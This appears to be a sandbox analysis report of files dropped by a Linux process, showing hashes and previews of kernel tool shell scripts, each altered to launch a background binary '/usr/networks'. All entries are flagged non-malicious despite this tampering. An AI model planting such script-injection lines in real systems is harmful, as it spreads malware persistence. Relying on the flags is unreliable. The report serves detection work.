                                                                        SHA-512:7279D50639DA40C0CB6FA8930895CE09CF0EB2FB41A0EC40F6C6ED542D0326E78927175783D3DBC570C4E08B87FECFDA585AE1D4E44BDB00511260C783B3008F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit.fi..full=$1.test=$2.nontest=$3..x=`cat $full | wc -l`.if [ $x -eq 1 ]; then..echo "There's only one function left, must be the bad one"..cat $full..exit 0.fi..let x=$x/2.let y=$x+1..if [ ! -f $full ]; then..echo "$full does not exist"..exit 1.fi..if [ -f $test ]; then..echo -n "$test exists, delete it? [y/N]"..read a..if [ "$a" != "y" -a "$a" != "Y" ]; then...exit 1..fi.fi..if [ -f $nontest ]; then..echo -n "$nontest exists, delete it? [y/N]"..read a..if [ "$a" != "y" -a "$a" != "Y" ]; then...exit 1..fi.fi..sed -ne "1,${x}p" $full > $test.sed -ne "$y,\$p" $full > $nontest../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1031
                                                                        Entropy (8bit):4.898245174609079
                                                                        Encrypted:false
                                                                        SSDEEP:24:PnsUDDkltWXlYWkvXlOIkvXlXLkTmKU+IcnsUUbDk19QkUmzyeZNkkUmnj655:PxPG2lYWWlhWlXLEmcxUHsG7mzdm7muv
                                                                        MD5:74FEEA347EB00465B2FF6A5BE46CE193
                                                                        SHA1:6005C8B5D8FD79C88F0CDB5B6EEB9E11778CCA0B
                                                                        SHA-256:460A83F842C839EE72F9FD88A787CFE97CE8F3F0DB23BCE2441CF7A364018B30
                                                                        SHA-512:768798570AD0DFCBCD01070FEA49B07779CB65174A7D855BB1F737B9B5995D842FA364312BA1D96BCC544BC3158C8A01450502A46CB1ADDBE4691E6997235452
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..function test_ex_suffix {..make -C ex V=1 clean > ex.out 2>&1...# use -rR to disable make's builtin rules..make -rR -C ex V=1 ex.o >> ex.out 2>&1..make -rR -C ex V=1 ex.i >> ex.out 2>&1..make -rR -C ex V=1 ex.s >> ex.out 2>&1...if [ -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...if [ ! -f ./ex/ex.o -o ! -f ./ex/ex.i -o ! -f ./ex/ex.s ]; then.. echo FAILED.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..function test_ex_include {..make -C ex V=1 clean > ex.out 2>&1...# build with krava.h include..touch ex/krava.h..make -C ex V=1 CFLAGS=-DINCLUDE >> ex.out 2>&1...if [ ! -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...# build without the include..rm -f ex/krava.h ex/ex..make -C ex V=1 >> ex.out 2>&1...if [ ! -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..echo -n Testing....test_ex.test_ex_suffix.test_ex_include..
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5106
                                                                        Entropy (8bit):5.190549172542396
                                                                        Encrypted:false
                                                                        SSDEEP:96:mpzdPYL4qY63562BXlrbCZpygpSEKejb36/jNE4XmJocZejkmav:+dAn1N618E9HO/X0oox
                                                                        MD5:DC156EF93268E173D39F8BAAF8978ABB
                                                                        SHA1:6E251C5140BF99DD85D6FE5CCBF82FE5F7DBD25D
                                                                        SHA-256:BB35B90477911C8A5E397FB4AF4AB5AAB25067DAFD6062567B7E906F3932B0E1
                                                                        SHA-512:5638FE84DBB13D9862EC314A58789EBE79A158576BA2BA120FE7973F6F11F18A0B5C0F3FA1867EA0ECFD09063CF738841F287A6342C3A578C8DC70D1F0504BE2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if [ ! -f $led_defs_path ]; then..echo "$led_defs_path doesn't exist"..exit 1.fi..led_cdev_path=`echo $1 | sed s'/\/$//'`..ls "$led_cdev_path/brightness" > /dev/null 2>&1.if [ $? -ne 0 ]; then..echo "Device \"$led_cdev_path\" does not exist."..exit 1.fi..bus=`readlink $led_cdev_path/device/subsystem | sed s'/.*\///'`.usb_subdev=`readlink $led_cdev_path | grep usb | sed s'/\(.*usb[0-9]*\/[0-9]*-[0-9]*\)\/.*/\1/'`.ls "$led_cdev_path/device/of_node/compatible" > /dev/null 2>&1.of_node_missing=$?..if [ "$bus" = "input" ]; then..input_node=`readlink $led_cdev_path/device | sed s'/.*\///'`..if [ ! -z "$usb_subdev" ]; then...bus="usb"..fi.fi..if [ "$bus" = "usb" ]; then..usb_interface=`readlink $led_cdev_path | sed s'/.*\(usb[0-9]*\)/\1/' | cut -d\/ -f3`..cd $led_cdev_path/../$usb_subdev..driver=`readlink $usb_interface/driver | sed s'/.*\///'`..if [ -d "$usb_interface/ieee80211" ]; then...wifi_phy=`ls -l $usb_interface/ieee80211 | grep phy | awk '{print $9}'`..fi.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):821
                                                                        Entropy (8bit):4.94867885977058
                                                                        Encrypted:false
                                                                        SSDEEP:24:R0T53Bv5a0AdgAklFKMRk4q+D2VIa8190I/:ROBv00TnlFKQk4qmAYGY
                                                                        MD5:53CB60A015FB1536F58CA145670656F9
                                                                        SHA1:FA1FDDC86852107CE96D1E4F74F681A61FCEC45A
                                                                        SHA-256:EFF34D4C6394243F0DC6EBEAED9BFB4A88AF69C086D22736B70586320D7E60EB
                                                                        SHA-512:AAA81CD721DF911EA07BC5144A15F8E090F7773ED0C12086D41206458EF3BEABAC48761D62AA54020416CB1345788FBEBC33AA768CF4DB5B61AAFB16C6CA1AC9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 255.fi..# Create any new directories that have appeared in the github litmus.# repo since the last run..if test "$LKMM_DESTDIR" != ".".then..find $litmusdir -type d -print |..( cd "$LKMM_DESTDIR"; sed -e 's/^/mkdir -p /' | sh ).fi..# Find the checklitmus script. If it is not where we expect it, then.# assume that the caller has the PATH environment variable set.# appropriately..if test -x scripts/checklitmus.sh.then..clscript=scripts/checklitmus.sh.else..clscript=checklitmus.sh.fi..# Run the script on all the litmus tests in the specified directory.ret=0.for i in $litmusdir/*.litmus.do..if ! $clscript $i..then...ret=1..fi.done.if test "$ret" -ne 0.then..echo " ^^^ VERIFICATION MISMATCHES" 1>&2.else..echo All litmus tests verified as was expected. 1>&2.fi.exit $ret../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):238
                                                                        Entropy (8bit):5.071110010800678
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaEJZKQRFKVRMKU7SKVxstn17QLGiX9DIgM3o287AX8Vx27B7AY7QLsLImp25G:SHRFKkf6tGJRnMYR7A0g7tAhAIcADMn
                                                                        MD5:9D4B9506D89C638D6D8274F863158FF5
                                                                        SHA1:808852D855162FD0825E8F60F3E1969A0B2666F2
                                                                        SHA-256:8FA50AD52F48649C6688AEC4A9098BEE1303DB3E48CAEC578CC1C0C0D1CE387D
                                                                        SHA-512:A3007389BCDE5749CB0023EC196956FC93148A4FDB45E9014AFE46F5991F4D64244D5A82680156639CD285DB7589D433071C298786A5A31B03DE02929C2AF677
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 255.fi..echo Herd options: $herdoptions > $LKMM_DESTDIR/$litmus.out./usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $litmus >> $LKMM_DESTDIR/$litmus.out 2>&1..scripts/judgelitmus.sh $litmus../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1323
                                                                        Entropy (8bit):5.176348294995237
                                                                        Encrypted:false
                                                                        SSDEEP:24:rvV7wy7SOPnbjavF+8Yxw8wynJA//3OBZhnDLAejinuJYqgIW:rvZL7Hqv4vxw8wiJyeDLdjinqgIW
                                                                        MD5:E1B6CD014E82774900528014EF0D6F2E
                                                                        SHA1:ED30423AC7DC87314B36C6E41813C6A67D02117F
                                                                        SHA-256:31B7794E2BE2068A4A322B3209E67C7C83519C06F9EB1139BC2849BBCB92BE47
                                                                        SHA-512:126676C1B47B9594F0B6555083D37086C5EA63B8C8BC70E59C96CE0D7614F0E9725346BB053D0836C2D5B775FDC1D42662C518A014868B62F52F9CA295C8818B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Create the results directory and populate it with subdirectories..# The initial output is created here to avoid clobbering the output.# generated earlier..mkdir $T/results.find litmus -type d -print | ( cd $T/results; sed -e 's/^/mkdir -p /' | sh )..# Create the list of litmus tests already run, then remove those that.# are excluded by this run's --procs argument..( cd $LKMM_DESTDIR; find litmus -name '*.litmus.out' -print ) |..sed -e 's/\.out$//' |..xargs -r grep -L "^P${LKMM_PROCS}"> $T/list-C-already.xargs < $T/list-C-already -r grep -L "^P${LKMM_PROCS}" > $T/list-C-short..# Redirect output, run tests, then restore destination directory..destdir="$LKMM_DESTDIR".LKMM_DESTDIR=$T/results; export LKMM_DESTDIR.scripts/runlitmushist.sh < $T/list-C-short > $T/runlitmushist.sh.out 2>&1.LKMM_DESTDIR="$destdir"; export LKMM_DESTDIR..# Move the newly generated .litmus.out files to .litmus.out.new files.# in the destination directory..cdir=`pwd`.ddir=`awk -v c="$cd
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):58
                                                                        Entropy (8bit):4.00869856467617
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVay6vBBvKDlOORgn:w6vfK4n
                                                                        MD5:22E8085372E3C003B959BE0A933F9CEB
                                                                        SHA1:5CDE716897DC5B6292E7D1FA46016E94F99BEDDD
                                                                        SHA-256:80982D86AADCE09EDE1347AF7482DCC96B62072095F0A89CDB5449551ECEA9CC
                                                                        SHA-512:0B4BC529920464D4B403CCB3ED8FAC48EA36C1F32FCF2F3CCBFAFA29C81639173241E08C0620EC50A06AD933F6F90B5BE72EFB4964734832E4ECDED1712A6E35
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1367
                                                                        Entropy (8bit):5.270907869988027
                                                                        Encrypted:false
                                                                        SSDEEP:24:5DFAFYyoClvAOwGzGS3ijcSGKpf7lIr7QjfGuo7CC7QjCj:5XYoN+pSrpf7Cr7yHo737j
                                                                        MD5:172B8DAE8369EA2330CE22C4B1174B3E
                                                                        SHA1:759FCB2912FC0CAD0665ED443B742D9422D2C6CC
                                                                        SHA-256:47E367795A2B50C36481670343B8E156283738611DEFF3A3D31546E10DF64FDE
                                                                        SHA-512:95B88828588226BE0EC0E2D4E59B6A80C16F0243DB407BCE510B8F4962D7C84769F62F3CBD83EEBEFF54185BB39191CD4FCD98F37AA583AD343A25C0685C99BB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 255.fi.if test -f "$LKMM_DESTDIR/$litmus".out -a -r "$LKMM_DESTDIR/$litmus".out.then..:.else..echo ' --- ' error: \"$LKMM_DESTDIR/$litmus\".out is not a readable file..exit 255.fi.if grep -q '^ \* Result: ' $litmus.then..outcome=`grep -m 1 '^ \* Result: ' $litmus | awk '{ print $3 }'`.else..outcome=specified.fi..grep '^Observation' $LKMM_DESTDIR/$litmus.out.if grep -q '^Observation' $LKMM_DESTDIR/$litmus.out.then..:.else..echo ' !!! Verification error' $litmus..if ! grep -q '!!!' $LKMM_DESTDIR/$litmus.out..then...echo ' !!! Verification error' >> $LKMM_DESTDIR/$litmus.out 2>&1..fi..exit 255.fi.if test "$outcome" = DEADLOCK.then..if grep '^Observation' $LKMM_DESTDIR/$litmus.out | grep -q 'Never 0 0$'..then...ret=0..else...echo " !!! Unexpected non-$outcome verification" $litmus...if ! grep -q '!!!' $LKMM_DESTDIR/$litmus.out...then....echo " !!! Unexpected non-$outcome verification" >> $LKMM_DESTDIR/$litmus.out 2>&1...fi...ret=1..fi.elif grep '^Observation' $LKMM_DE
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1280
                                                                        Entropy (8bit):5.0293104555166925
                                                                        Encrypted:false
                                                                        SSDEEP:24:rI0T53Bv5aSj7CT+8YxwGedC/xzBwyBlzBxTwPN0xXjOhmpq4:rIOBv0chvxww5lwa9BxTwV098E
                                                                        MD5:02F7CF80354BAC6CF9C89AF6FF3CFF6C
                                                                        SHA1:C79857207AA510D3CFCD4CF550D5180031151523
                                                                        SHA-256:D82CD5F2B11EF107DCE3B0F870925AB18172614DC3948CBABBF7816A699E3167
                                                                        SHA-512:74660F916E6AEE1C4E512A72F2362FB61E1AC74E0CCE15C0AD7DE9FA41B530DE14F647DFAC11EECEA314FF50CE59DB612D37D2F1E4C82F68885993110C25F44E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Create any new directories that have appeared in the github litmus.# repo since the last run..if test "$LKMM_DESTDIR" != ".".then..find litmus -type d -print |..( cd "$LKMM_DESTDIR"; sed -e 's/^/mkdir -p /' | sh ).fi..# Create a list of the C-language litmus tests previously run..( cd $LKMM_DESTDIR; find litmus -name '*.litmus.out' -print ) |..sed -e 's/\.out$//' |..xargs -r grep -L "^P${LKMM_PROCS}"> $T/list-C-already..# Form full list of litmus tests with no more than the specified.# number of processes (per the --procs argument)..find litmus -name '*.litmus' -exec grep -l -m 1 "^C " {} \; > $T/list-C-all.xargs < $T/list-C-all -r grep -L "^P${LKMM_PROCS}" > $T/list-C-short..# Form list of new tests. Note: This does not handle litmus-test deletion!.sort $T/list-C-already $T/list-C-short | uniq -u > $T/list-C-new..# Form list of litmus tests that have changed since the last run..sed < $T/list-C-short -e 's,^.*$,if test & -nt '"$LKMM_DESTDIR"'/&.out; then
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1879
                                                                        Entropy (8bit):5.440616965091095
                                                                        Encrypted:false
                                                                        SSDEEP:24:Xh5s1mUKl+RTKH/EI8dS4LThfuTWVhxPVUnvKMLdeP9UcvyP4rTMD0DVDT/VI9Vy:xU6l+ReHsZSspTVU9Ldc9Ucdo0xDT/Ay
                                                                        MD5:4C06EBFB05EA8E30772579E05023463A
                                                                        SHA1:EB26B02ABCE95938F951FB9C9EEE0B78E6750851
                                                                        SHA-256:1931EE8FC36415CD7B34DB8A4DE4F26DF91DFD87A5DFD73D036A5C705AD4D83B
                                                                        SHA-512:7EF3D6ECC82116BD799C104F908D2DAD9214B3636D6A796D11057D23AF9E71800170BEEDA7E65EFE93249B8A321F20C671AB7C742A248351ACDF6AC6AAB29600
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..usage () {..usagehelp 1>&2.}..# checkarg --argname argtype $# arg mustmatch cannotmatch.checkarg () {..if test $3 -le 1..then...echo $1 needs argument $2 matching \"$5\"...usage..fi..if echo "$4" | grep -q -e "$5"..then...:..else...echo $1 $2 \"$4\" must match \"$5\"...usage..fi..if echo "$4" | grep -q -e "$6"..then...echo $1 $2 \"$4\" must not match \"$6\"...usage..fi.}..while test $# -gt 0.do..case "$1" in..--destdir)...checkarg --destdir "(path to directory)" "$#" "$2" '.\+' '^--'...LKMM_DESTDIR="$2"...mkdir $LKMM_DESTDIR > /dev/null 2>&1...if ! test -e "$LKMM_DESTDIR"...then....echo "Cannot create directory --destdir '$LKMM_DESTDIR'"....usage...fi...if test -d "$LKMM_DESTDIR" -a -w "$LKMM_DESTDIR" -a -x "$LKMM_DESTDIR"...then....:...else....echo "Directory --destdir '$LKMM_DESTDIR' insufficient permissions to create files"....usage...fi...shift...;;..--herdopts|--herdopt)...checkarg --destdir "(herd7 options)" "$#" "$2" '.*' '^--'...LKMM_HERD_OPTIONS="$2"
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1443
                                                                        Entropy (8bit):5.41418500417696
                                                                        Encrypted:false
                                                                        SSDEEP:24:rfccQtgUqueyYMY4QSh7Lxh7L2Qq424xBKQVZo+ARMxEZdjHsH+JYogedjV0OcNE:rUrtx/YMY4QwfPf2dR4xBKkZiMxOeH+P
                                                                        MD5:44C78B91109C3A4958CC8E2C2FC8E238
                                                                        SHA1:06DE355AEA0AADCDD20C42F7EC9F62C546061703
                                                                        SHA-256:A628A0EED4A15189005511AC4BCEA2E66336C449FFD6CC3128B5E60AF7A0F572
                                                                        SHA-512:4BC6BAF05DAE9908727DACF5318ADDB7470D0A727653C369525FD34F2ACB418257508F198D232AF59061B8DF4D2B33CDF1F04FE76F2E92A0590495E3398D9446
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Prefixes for per-CPU scripts.for ((i=0;i<$LKMM_JOBS;i++)).do..echo dir="$LKMM_DESTDIR" > $T/$i.sh..echo T=$T >> $T/$i.sh..echo herdoptions=\"$LKMM_HERD_OPTIONS\" >> $T/$i.sh..cat << '___EOF___' >> $T/$i.sh..runtest () {...echo ' ... ' /usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $1 '>' $dir/$1.out '2>&1'...if /usr/bin/time $LKMM_TIMEOUT_CMD herd7 $herdoptions $1 > $dir/$1.out 2>&1...then....if ! grep -q '^Observation ' $dir/$1.out....then.....echo ' !!! Herd failed, no Observation:' $1....fi...else....exitcode=$?....if test "$exitcode" -eq 124....then.....exitmsg="timed out"....else.....exitmsg="failed, exit code $exitcode"....fi....echo ' !!! Herd' ${exitmsg}: $1...fi..}.___EOF___.done..awk -v q="'" -v b='\\' '.{..print "echo `grep " q "^P[0-9]" b "+(" q " " $0 " | tail -1 | sed -e " q "s/^P" b "([0-9]" b "+" b ")(.*$/" b "1/" q "` " $0.}' | bash |.sort -k1n |.awk -v ncpu=$LKMM_JOBS -v t=$T '.{..print "runtest " $2 >> t "/" NR % ncpu ".sh";.}..END {
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):723
                                                                        Entropy (8bit):5.350945108759267
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vWyou60IXQrFQjsLUgqXl2nwJ6vAEqNT8oFlEgthlPpLiflme5qOzCdwRpW4RV:rW9j0NrFcsLoXl2zAlRZ3EO/PpLgecp1
                                                                        MD5:B11F4C76E62677D0C2C93338430FDE43
                                                                        SHA1:B65C4B0CBAB7AE00CBB3CA2BAC57B36C74295355
                                                                        SHA-256:B1C5813EF3CC813C1CE5B9A6820D0F0E4B1DAE90F3D9B1EEBDC1875C5DA51B7D
                                                                        SHA-512:592A2B91DD3DF13EF1FECDFB4B2BCA0CA2E7020226314727560935DF36B2FDA46727DEBD16C410D12C67C82BB1A62DA6725BFD950BF89341FC5BED44B94FA27D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Check that the fault injection directory exists.DEBUGDIR=`echo $DEBUGFS | awk '{print $2}'`/nfsd.if [ ! -d "$DEBUGDIR" ]; then..echo "$DEBUGDIR does not exist"..echo "Check that your .config selects CONFIG_NFSD_FAULT_INJECTION"..exit 1.fi..function help().{..echo "Usage $0 injection_type [count]"..echo ""..echo "Injection types are:"..ls $DEBUGDIR..exit 1.}..if [ $# == 0 ]; then..help.elif [ ! -f $DEBUGDIR/$1 ]; then..help.elif [ $# != 2 ]; then..COUNT=0.else..COUNT=$2.fi..BEFORE=`mktemp`.AFTER=`mktemp`.dmesg > $BEFORE.echo $COUNT > $DEBUGDIR/$1.dmesg > $AFTER.# Capture lines that only exist in the $AFTER file.diff $BEFORE $AFTER | grep ">".rm -f $BEFORE $AFTER../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):458
                                                                        Entropy (8bit):5.00959691163534
                                                                        Encrypted:false
                                                                        SSDEEP:12:b/yF8GAh5AE4O35gZ8AN5AE4OMai5AE4ZAiFafG5AE4ZAi9ZSMn:b/m85kOJfc5kOVi5kZufG5kZvZ
                                                                        MD5:A4755C3D7F96AC9DDB980618EE1941CC
                                                                        SHA1:7483B6428F3BD46ABC16B7CB1D04509A56763D10
                                                                        SHA-256:AA6A92BAA645AA58764662FD541332178E1F5AB133B5A288FB2D287A857B70E4
                                                                        SHA-512:54CE3A1EEAB05442A80A1804152EC77C4418DFC81EC108B584788D19FEF14939C0E2322FA9D87B1E0894B44C0B7B07789A267B67F5350EED72B4600D698778EB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..cd ../....for i in $FILES; do. check $i.done..check arch/x86/include/asm/inat.h '-I "^#include [\"<]\(asm/\)*inat_types.h[\">]"'.check arch/x86/include/asm/insn.h '-I "^#include [\"<]\(asm/\)*inat.h[\">]"'.check arch/x86/lib/inat.c '-I "^#include [\"<]\(../include/\)*asm/insn.h[\">]"'.check arch/x86/lib/insn.c '-I "^#include [\"<]\(../include/\)*asm/in\(at\|sn\).h[\">]"'../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):584
                                                                        Entropy (8bit):4.880830745314398
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vCBmMU31bL21fijNv2YPJsPOvMp66ijNrJsPOvMbIj62fUfGn:rCUMUlbk8NvFPuPq06vNruPqK66XG
                                                                        MD5:6BDDA309AAC612431FEB20AFC9124980
                                                                        SHA1:8F5437F82EF33A58ACBEC1E066776CA9BF8EFC8A
                                                                        SHA-256:43A9E0DD99528C7F3B14ED56C6E1F437D324CB8477F30E752F65029045BD02F5
                                                                        SHA-512:FF1B93D16F7B1D233D48FD49B7930253AE28190DE932B9B448DA22FC5DFA5A90C3FD6CA94C493FF25E2A5C820AEFD01F36558F0240519A4D5C2424F44DCA5B47
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..cd $(dirname $0)..trap 'echo "Might need a more recent version of binutils"' EXIT..echo "Compiling insn-x86-dat-src.c to 64-bit object"..gcc -g -c insn-x86-dat-src.c..objdump -dSw insn-x86-dat-src.o | awk -f gen-insn-x86-dat.awk > insn-x86-dat-64.c..rm -f insn-x86-dat-src.o..echo "Compiling insn-x86-dat-src.c to 32-bit object"..gcc -g -c -m32 insn-x86-dat-src.c..objdump -dSw insn-x86-dat-src.o | awk -f gen-insn-x86-dat.awk > insn-x86-dat-32.c..rm -f insn-x86-dat-src.o..trap - EXIT..echo "Done (use git diff to see the changes)"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1155
                                                                        Entropy (8bit):5.244205012386464
                                                                        Encrypted:false
                                                                        SSDEEP:24:6fZ7Ed9hko5L6ko5Lk5U5kAo5BY85kOJfc5kOVR5kZuN5kZv4e12c52T:6x6dN6dNkmS5Y8Hfc5CQCA+2C2T
                                                                        MD5:9A01A481DCF3426E4D3D2CD18882AB28
                                                                        SHA1:A97052DA5C09338D04BCD380313B275BE6E42944
                                                                        SHA-256:60BF226ABC9F5B3D5AC0C591B4BF9BD07749A36171D85A0C1F5EA0DC985037E1
